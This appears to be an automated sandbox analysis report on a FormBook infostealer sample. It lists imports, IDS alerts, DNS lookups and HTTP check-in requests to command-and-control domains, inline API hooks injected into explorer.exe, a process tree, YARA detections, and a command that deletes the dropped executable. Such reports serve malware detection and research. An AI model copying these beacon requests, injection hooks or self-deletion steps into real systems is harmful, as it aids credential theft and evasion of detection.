KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
10/03/22-16:00:41.738205 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49708 | 80 | 192.168.2.3 | 103.224.212.221
10/03/22-16:00:41.738205 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49708 | 80 | 192.168.2.3 | 103.224.212.221
10/03/22-16:00:41.738205 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49708 | 80 | 192.168.2.3 | 103.224.212.221
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 3, 2022 16:00:18.956696987 CEST | 49707 | 80 | 192.168.2.3 | 5.101.152.161
Oct 3, 2022 16:00:19.028978109 CEST | 80 | 49707 | 5.101.152.161 | 192.168.2.3
Oct 3, 2022 16:00:19.029166937 CEST | 49707 | 80 | 192.168.2.3 | 5.101.152.161
Oct 3, 2022 16:00:19.045396090 CEST | 49707 | 80 | 192.168.2.3 | 5.101.152.161
Oct 3, 2022 16:00:19.116703987 CEST | 80 | 49707 | 5.101.152.161 | 192.168.2.3
Oct 3, 2022 16:00:19.127684116 CEST | 80 | 49707 | 5.101.152.161 | 192.168.2.3
Oct 3, 2022 16:00:19.127712011 CEST | 80 | 49707 | 5.101.152.161 | 192.168.2.3
Oct 3, 2022 16:00:19.127924919 CEST | 49707 | 80 | 192.168.2.3 | 5.101.152.161
Oct 3, 2022 16:00:19.127958059 CEST | 49707 | 80 | 192.168.2.3 | 5.101.152.161
Oct 3, 2022 16:00:19.201196909 CEST | 80 | 49707 | 5.101.152.161 | 192.168.2.3
Oct 3, 2022 16:00:41.572072029 CEST | 49708 | 80 | 192.168.2.3 | 103.224.212.221
Oct 3, 2022 16:00:41.737982035 CEST | 80 | 49708 | 103.224.212.221 | 192.168.2.3
Oct 3, 2022 16:00:41.738086939 CEST | 49708 | 80 | 192.168.2.3 | 103.224.212.221
Oct 3, 2022 16:00:41.738204956 CEST | 49708 | 80 | 192.168.2.3 | 103.224.212.221
Oct 3, 2022 16:00:41.939363003 CEST | 80 | 49708 | 103.224.212.221 | 192.168.2.3
Oct 3, 2022 16:00:41.941509008 CEST | 49708 | 80 | 192.168.2.3 | 103.224.212.221
Oct 3, 2022 16:00:41.941654921 CEST | 49708 | 80 | 192.168.2.3 | 103.224.212.221
Oct 3, 2022 16:00:42.107552052 CEST | 80 | 49708 | 103.224.212.221 | 192.168.2.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 3, 2022 16:00:18.870301008 CEST | 57990 | 53 | 192.168.2.3 | 8.8.8.8
Oct 3, 2022 16:00:18.944986105 CEST | 53 | 57990 | 8.8.8.8 | 192.168.2.3
Oct 3, 2022 16:00:41.398914099 CEST | 52387 | 53 | 192.168.2.3 | 8.8.8.8
Oct 3, 2022 16:00:41.570863008 CEST | 53 | 52387 | 8.8.8.8 | 192.168.2.3
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 3, 2022 16:00:18.870301008 CEST | 192.168.2.3 | 8.8.8.8 | 0x1a5c | Standard query (0) | www.nordenergogrup.store | A (IP address) | IN (0x0001) | false
Oct 3, 2022 16:00:41.398914099 CEST | 192.168.2.3 | 8.8.8.8 | 0x2286 | Standard query (0) | www.sandstormcase.us | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 3, 2022 16:00:18.944986105 CEST | 8.8.8.8 | 192.168.2.3 | 0x1a5c | No error (0) | www.nordenergogrup.store | | 5.101.152.161 | A (IP address) | IN (0x0001) | false
Oct 3, 2022 16:00:41.570863008 CEST | 8.8.8.8 | 192.168.2.3 | 0x2286 | No error (0) | www.sandstormcase.us | | 103.224.212.221 | A (IP address) | IN (0x0001) | false
                  • www.nordenergogrup.store
                  • www.sandstormcase.us
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49707 | 5.101.152.161 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Oct 3, 2022 16:00:19.045396090 CEST | 338 | OUT | GET /sk29/?f2Jdmp=/dAaGq0HlK8GRVwC0eZiOsNSw3Abl/LxCMSzQhtOo+vkboQqmAD6TQGCAVscPIh/3NW5&j8Ot3=AVtD HTTP/1.1
Host: www.nordenergogrup.store
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Oct 3, 2022 16:00:19.127684116 CEST | 339 | IN | HTTP/1.1 404 Not Found
                  Server: nginx-reuseport/1.21.1
                  Date: Mon, 03 Oct 2022 14:00:19 GMT
                  Content-Type: text/html; charset=iso-8859-1
                  Content-Length: 284
                  Connection: close
                  Vary: Accept-Encoding
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 31 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 6f 72 64 65 6e 65 72 67 6f 67 72 75 70 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.51 (Unix) Server at www.nordenergogrup.store Port 80</address></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  1 | 192.168.2.3 | 49708 | 103.224.212.221 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Oct 3, 2022 16:00:41.738204956 CEST | 340 | OUT | GET /sk29/?f2Jdmp=M3Z0NOd5fAliwCg3EZwT2t6453H5ahVdrEePvIndisgPyIDGbv67zsai9msKV993IDUg&j8Ot3=AVtD HTTP/1.1
                  Host: www.sandstormcase.us
                  Connection: close
                  Data Raw: 00 00 00 00 00 00 00
                  Data Ascii:
                  Oct 3, 2022 16:00:41.939363003 CEST | 340 | IN | HTTP/1.1 302 Found
                  Date: Mon, 03 Oct 2022 14:00:41 GMT
                  Server: Apache/2.4.38 (Debian)
                  Set-Cookie: __tad=1664805641.1466436; expires=Thu, 30-Sep-2032 14:00:41 GMT; Max-Age=315360000
                  Location: http://ww38.sandstormcase.us/sk29/?f2Jdmp=M3Z0NOd5fAliwCg3EZwT2t6453H5ahVdrEePvIndisgPyIDGbv67zsai9msKV993IDUg&j8Ot3=AVtD
                  Content-Length: 0
                  Connection: close
                  Content-Type: text/html; charset=UTF-8


                  Code Manipulations

                  Function Name | Hook Type | Active in Processes
                  PeekMessageA | INLINE | explorer.exe
                  PeekMessageW | INLINE | explorer.exe
                  GetMessageW | INLINE | explorer.exe
                  GetMessageA | INLINE | explorer.exe
                  Function Name | Hook Type | New Data
                  PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x87 0x7E 0xE6
                  PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8F 0xFE 0xE6
                  GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8F 0xFE 0xE6
                  GetMessageA | INLINE | 0x48 0x8B 0xB8 0x87 0x7E 0xE6


                  Target ID:0
                  Start time:15:58:40
                  Start date:03/10/2022
                  Path:C:\Users\user\Desktop\primosdv3.1.1.0.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\Desktop\primosdv3.1.1.0.exe
                  Imagebase:0xc60000
                  File size:577991 bytes
                  MD5 hash:633BB3AB12D6FD7B6956AA3A93F55E9C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low

                  Target ID:1
                  Start time:15:58:42
                  Start date:03/10/2022
                  Path:C:\Users\user\AppData\Local\Temp\bstkiooen.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
                  Imagebase:0x1d0000
                  File size:6144 bytes
                  MD5 hash:A2AF309781DF2F75DC0B57AE63B0F3A9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Antivirus matches:
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 24%, ReversingLabs
                  Reputation:low

                  Target ID:2
                  Start time:15:58:43
                  Start date:03/10/2022
                  Path:C:\Users\user\AppData\Local\Temp\bstkiooen.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
                  Imagebase:0x1d0000
                  File size:6144 bytes
                  MD5 hash:A2AF309781DF2F75DC0B57AE63B0F3A9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Author: unknown
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Author: unknown
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Author: unknown
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  Target ID:3
                  Start time:15:58:46
                  Start date:03/10/2022
                  Path:C:\Windows\explorer.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Explorer.EXE
                  Imagebase:0x7ff69fe90000
                  File size:3933184 bytes
                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:high

                  Target ID:13
                  Start time:15:59:35
                  Start date:03/10/2022
                  Path:C:\Windows\SysWOW64\svchost.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\svchost.exe
                  Imagebase:0x350000
                  File size:44520 bytes
                  MD5 hash:FA6C268A5B5BDA067A901764D203D433
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:high

                  Target ID:14
                  Start time:15:59:38
                  Start date:03/10/2022
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:/c del "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
                  Imagebase:0xb0000
                  File size:232960 bytes
                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:15
                  Start time:15:59:38
                  Start date:03/10/2022
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff745070000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  No disassembly